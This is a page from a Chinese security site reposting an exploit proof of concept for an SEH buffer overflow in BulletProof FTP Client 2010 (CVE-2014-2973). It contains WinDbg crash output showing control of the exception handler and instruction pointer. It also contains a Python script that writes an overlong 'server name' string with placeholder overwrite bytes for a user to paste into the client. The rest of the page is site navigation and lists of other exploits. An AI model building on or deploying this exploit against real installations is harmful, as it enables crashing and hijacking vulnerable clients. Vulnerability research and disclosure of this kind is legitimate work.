首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛

当前位置：主页>安全文章>文章资料>Exploits>文章内容 BulletProof FTP Client 2010 - Buffer Overflow (SEH) 来源：vfocus.net 作者：Seljan 发布时间：2014-07-25   #-----------------------------------------------------------------------------# # Exploit Title: BulletProof FTP Client 2010 - Buffer Overflow (SEH)          # # Date: Jul 24 2014                                                           # # Exploit Author: Gabor Seljan                                                # # Software Link: http://www.bpftp.com/                                        # # Version: 2010.75.0.76                                                       # # Tested on: Windows XP SP3                                                   # # CVE: CVE-2014-2973                                                          # #-----------------------------------------------------------------------------# ''' (a00.9e4): Access violation - code c0000005 (first chance) First chance exceptions are reported before any exception handling. This exception may be expected and handled. eax=41414141 ebx=41414141 ecx=007ef590 edx=00000000 esi=017a4f6a edi=017a516a eip=005c005b esp=0012f594 ebp=0012f610 iopl=0         nv up ei pl zr na pe nc cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010246 *** ERROR: Symbol file could not be found.  Defaulted to export symbols for bpftpclient.exe - bpftpclient+0x1c005b: 005c005b f6431c10        test    byte ptr [ebx+1Ch],10h     ds:0023:4141415d=?? 0:000> !exchain 0012f59c: bpftpclient+1c044e (005c044e) 0012f5a8: bpftpclient+1c046b (005c046b) 0012f618: 43434343 Invalid exception stack at 42424242 0:000> g (a00.9e4): Access violation - code c0000005 (first chance) First chance exceptions are reported before any exception handling. This exception may be expected and handled. eax=00000000 ebx=00000000 ecx=43434343 edx=7c9032bc esi=00000000 edi=00000000 eip=43434343 esp=0012f1c4 ebp=0012f1e4 iopl=0         nv up ei pl zr na pe nc cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010246 43434343 ??              ??? ''' #!/usr/bin/python junk1 = b'\x41' * 89 nSEH  = b'\x42' * 4 SEH   = b'\x43' * 4 junk2 = b'\x44' * 1000 sploit = junk1 + nSEH + SEH + junk2 try:   print('[+] Creating exploit file...')   f = open('sploit.txt', 'wb')   f.write(sploit)   f.close()   print('[+] Exploit file created successfully!') except:   print('[!] Error while creating exploit file!') print('[+] Use the following as Server Name/IP with any user\'s credentials!') print(sploit.decode())   [推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]   匿名评论 评论内容：(不能超过250字，需审核后才会公布，请自觉遵守互联网相关政策法规。  §最新评论：

热点文章 ·CVE-2012-0217 Intel sysret exp ·Linux Kernel 2.6.32 Local Root ·Array Networks vxAG / xAPV Pri ·Novell NetIQ Privileged User M ·Array Networks vAPV / vxAG Cod ·Excel SLYK Format Parsing Buff ·PhpInclude.Worm - PHP Scripts ·Apache 2.2.0 - 2.2.11 Remote e ·VideoScript 3.0 <= 4.0.1.50 Of ·Yahoo! Messenger Webcam 8.1 Ac ·Family Connections <= 1.8.2 Re ·Joomla Component EasyBook 1.1   相关文章 ·Omeka 2.2.1 - Remote Code Exec ·Make 3.81 - Heap Overflow PoC ·Apache 2.4.x mod_proxy Denial ·MQAC.sys Arbitrary Write Privi ·DjVuLibre <= 3.5.25.3 - Out of ·Pligg 2.0.1 - Multiple Vulnera ·Kolibri WebServer 2.0 - GET Re ·Oxwall 1.7.0 - Remote Code Exe ·Microsoft XP SP3 MQAC.sys Arbi ·SkaDate Lite 2.0 - Remote Code ·Microsoft XP SP3 BthPan.sys Ar ·D-Link AP 3200 Multiple Vulner   推荐广告

CopyRight © 2002-2022 VFocuS.Net All Rights Reserved